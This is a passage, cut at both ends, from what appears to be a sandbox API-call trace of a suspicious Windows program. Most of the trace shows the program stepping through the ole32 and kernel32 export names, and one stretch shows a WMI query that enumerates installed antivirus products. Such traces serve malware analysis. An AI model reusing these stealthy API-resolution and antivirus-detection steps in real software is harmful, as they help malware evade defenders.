lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0162.475] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0162.475] lstrlenA (lpString="COGETOBJECT") returned 11 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0162.475] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0162.475] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0162.475] lstrlenA (lpString="COGETPSCLSID") returned 12 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0162.476] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0162.476] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0162.476] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0162.476] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0162.476] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0162.476] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0162.476] lstrlenA (lpString="COINITIALIZE") returned 12 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0162.476] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0162.476] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInitializeWOW" | out: lpString1="CoInitializeWOW") returned="CoInitializeWOW" [0162.476] lstrlenA (lpString="COINITIALIZEWOW") returned 15 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInstall" | out: lpString1="CoInstall") returned="CoInstall" [0162.476] lstrlenA (lpString="COINSTALL") returned 9 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoInvalidateRemoteMachineBindings" | out: lpString1="CoInvalidateRemoteMachineBindings") returned="CoInvalidateRemoteMachineBindings" [0162.476] lstrlenA (lpString="COINVALIDATEREMOTEMACHINEBINDINGS") returned 33 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoIsHandlerConnected" | out: lpString1="CoIsHandlerConnected") returned="CoIsHandlerConnected" [0162.476] lstrlenA (lpString="COISHANDLERCONNECTED") returned 20 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoIsOle1Class" | out: lpString1="CoIsOle1Class") returned="CoIsOle1Class" [0162.476] lstrlenA (lpString="COISOLE1CLASS") returned 13 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoLoadLibrary" | out: lpString1="CoLoadLibrary") returned="CoLoadLibrary" [0162.476] lstrlenA (lpString="COLOADLIBRARY") returned 13 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoLockObjectExternal" | out: lpString1="CoLockObjectExternal") returned="CoLockObjectExternal" [0162.476] lstrlenA (lpString="COLOCKOBJECTEXTERNAL") returned 20 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoMarshalHresult" | out: lpString1="CoMarshalHresult") returned="CoMarshalHresult" [0162.476] lstrlenA (lpString="COMARSHALHRESULT") returned 16 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoMarshalInterThreadInterfaceInStream" | out: lpString1="CoMarshalInterThreadInterfaceInStream") returned="CoMarshalInterThreadInterfaceInStream" [0162.476] lstrlenA (lpString="COMARSHALINTERTHREADINTERFACEINSTREAM") returned 37 [0162.476] lstrcpyA (in: lpString1=0x239e334, lpString2="CoMarshalInterface" | out: lpString1="CoMarshalInterface") returned="CoMarshalInterface" [0162.477] lstrlenA (lpString="COMARSHALINTERFACE") returned 18 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoPopServiceDomain" | out: lpString1="CoPopServiceDomain") returned="CoPopServiceDomain" [0162.477] lstrlenA (lpString="COPOPSERVICEDOMAIN") returned 18 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoPushServiceDomain" | out: lpString1="CoPushServiceDomain") returned="CoPushServiceDomain" [0162.477] lstrlenA (lpString="COPUSHSERVICEDOMAIN") returned 19 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoQueryAuthenticationServices" | out: lpString1="CoQueryAuthenticationServices") returned="CoQueryAuthenticationServices" [0162.477] lstrlenA (lpString="COQUERYAUTHENTICATIONSERVICES") returned 29 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoQueryClientBlanket" | out: lpString1="CoQueryClientBlanket") returned="CoQueryClientBlanket" [0162.477] lstrlenA (lpString="COQUERYCLIENTBLANKET") returned 20 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoQueryProxyBlanket" | out: lpString1="CoQueryProxyBlanket") returned="CoQueryProxyBlanket" [0162.477] lstrlenA (lpString="COQUERYPROXYBLANKET") returned 19 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoQueryReleaseObject" | out: lpString1="CoQueryReleaseObject") returned="CoQueryReleaseObject" [0162.477] lstrlenA (lpString="COQUERYRELEASEOBJECT") returned 20 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoReactivateObject" | out: lpString1="CoReactivateObject") returned="CoReactivateObject" [0162.477] lstrlenA (lpString="COREACTIVATEOBJECT") returned 18 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterChannelHook" | out: lpString1="CoRegisterChannelHook") returned="CoRegisterChannelHook" [0162.477] lstrlenA (lpString="COREGISTERCHANNELHOOK") returned 21 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterClassObject" | out: lpString1="CoRegisterClassObject") returned="CoRegisterClassObject" [0162.477] lstrlenA (lpString="COREGISTERCLASSOBJECT") returned 21 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterInitializeSpy" | out: lpString1="CoRegisterInitializeSpy") returned="CoRegisterInitializeSpy" [0162.477] lstrlenA (lpString="COREGISTERINITIALIZESPY") returned 23 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterMallocSpy" | out: lpString1="CoRegisterMallocSpy") returned="CoRegisterMallocSpy" [0162.477] lstrlenA (lpString="COREGISTERMALLOCSPY") returned 19 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterMessageFilter" | out: lpString1="CoRegisterMessageFilter") returned="CoRegisterMessageFilter" [0162.477] lstrlenA (lpString="COREGISTERMESSAGEFILTER") returned 23 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterPSClsid" | out: lpString1="CoRegisterPSClsid") returned="CoRegisterPSClsid" [0162.477] lstrlenA (lpString="COREGISTERPSCLSID") returned 17 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterSurrogate" | out: lpString1="CoRegisterSurrogate") returned="CoRegisterSurrogate" [0162.477] lstrlenA (lpString="COREGISTERSURROGATE") returned 19 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRegisterSurrogateEx" | out: lpString1="CoRegisterSurrogateEx") returned="CoRegisterSurrogateEx" [0162.477] lstrlenA (lpString="COREGISTERSURROGATEEX") returned 21 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoReleaseMarshalData" | out: lpString1="CoReleaseMarshalData") returned="CoReleaseMarshalData" [0162.477] lstrlenA (lpString="CORELEASEMARSHALDATA") returned 20 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoReleaseServerProcess" | out: lpString1="CoReleaseServerProcess") returned="CoReleaseServerProcess" [0162.477] lstrlenA (lpString="CORELEASESERVERPROCESS") returned 22 [0162.477] lstrcpyA (in: lpString1=0x239e334, lpString2="CoResumeClassObjects" | out: lpString1="CoResumeClassObjects") returned="CoResumeClassObjects" [0162.478] lstrlenA (lpString="CORESUMECLASSOBJECTS") returned 20 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRetireServer" | out: lpString1="CoRetireServer") returned="CoRetireServer" [0162.478] lstrlenA (lpString="CORETIRESERVER") returned 14 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRevertToSelf" | out: lpString1="CoRevertToSelf") returned="CoRevertToSelf" [0162.478] lstrlenA (lpString="COREVERTTOSELF") returned 14 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRevokeClassObject" | out: lpString1="CoRevokeClassObject") returned="CoRevokeClassObject" [0162.478] lstrlenA (lpString="COREVOKECLASSOBJECT") returned 19 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRevokeInitializeSpy" | out: lpString1="CoRevokeInitializeSpy") returned="CoRevokeInitializeSpy" [0162.478] lstrlenA (lpString="COREVOKEINITIALIZESPY") returned 21 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoRevokeMallocSpy" | out: lpString1="CoRevokeMallocSpy") returned="CoRevokeMallocSpy" [0162.478] lstrlenA (lpString="COREVOKEMALLOCSPY") returned 17 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoSetCancelObject" | out: lpString1="CoSetCancelObject") returned="CoSetCancelObject" [0162.478] lstrlenA (lpString="COSETCANCELOBJECT") returned 17 [0162.478] lstrcpyA (in: lpString1=0x239e334, lpString2="CoSetProxyBlanket" | out: lpString1="CoSetProxyBlanket") returned="CoSetProxyBlanket" [0162.478] lstrlenA (lpString="COSETPROXYBLANKET") returned 17 [0162.478] CoSetProxyBlanket (pProxy=0x255cfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0162.478] IWbemServices:ExecQuery (in: This=0x255cfe4, strQueryLanguage="WQL", strQuery="Select * From AntiVirusPr", lFlags=32, pCtx=0x0, ppEnum=0x1b000c | out: ppEnum=0x1b000c*=0x255c754) returned 0x0 [0162.826] IEnumWbemClassObject:Next (in: This=0x255c754, lTimeout=-1, uCount=0x1, apObjects=0x239ef98, puReturned=0x239ef9c | out: apObjects=0x239ef98*=0x0, puReturned=0x239ef9c*=0x0) returned 0x1 [0163.267] lstrlenA (lpString="kernel32.dll") returned 12 [0163.268] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0163.268] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0163.268] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0163.268] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0163.268] lstrlenA (lpString="ADDATOMA") returned 8 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0163.268] lstrlenA (lpString="ADDATOMW") returned 8 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0163.268] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0163.268] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0163.268] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0163.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0163.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0163.268] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0163.268] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0163.268] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0163.268] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0163.268] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0163.268] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0163.268] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0163.268] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0163.269] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0163.269] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0163.269] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0163.269] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0163.269] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0163.269] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0163.269] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0163.269] lstrlenA (lpString="BACKUPREAD") returned 10 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0163.269] lstrlenA (lpString="BACKUPSEEK") returned 10 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0163.269] lstrlenA (lpString="BACKUPWRITE") returned 11 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0163.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0163.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0163.269] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0163.269] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0163.269] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0163.269] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0163.269] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0163.269] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0163.269] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0163.269] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0163.270] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0163.270] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0163.270] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0163.270] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0163.270] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0163.270] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0163.270] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0163.270] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0163.270] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0163.270] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0163.270] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0163.270] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0163.270] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0163.270] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0163.270] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0163.270] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0163.270] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0163.270] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0163.270] lstrlenA (lpString="BEEP") returned 4 [0163.270] lstrcpyA (in: lpString1=0x239e35c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0163.270] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0163.271] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0163.271] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0163.271] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0163.271] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0163.271] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0163.271] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0163.271] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0163.271] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0163.271] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0163.271] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0163.271] lstrlenA (lpString="CANCELIO") returned 8 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0163.271] lstrlenA (lpString="CANCELIOEX") returned 10 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0163.271] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0163.271] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0163.271] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0163.271] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0163.271] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0163.271] lstrlenA (lpString="CHECKELEVATION") returned 14 [0163.271] lstrcpyA (in: 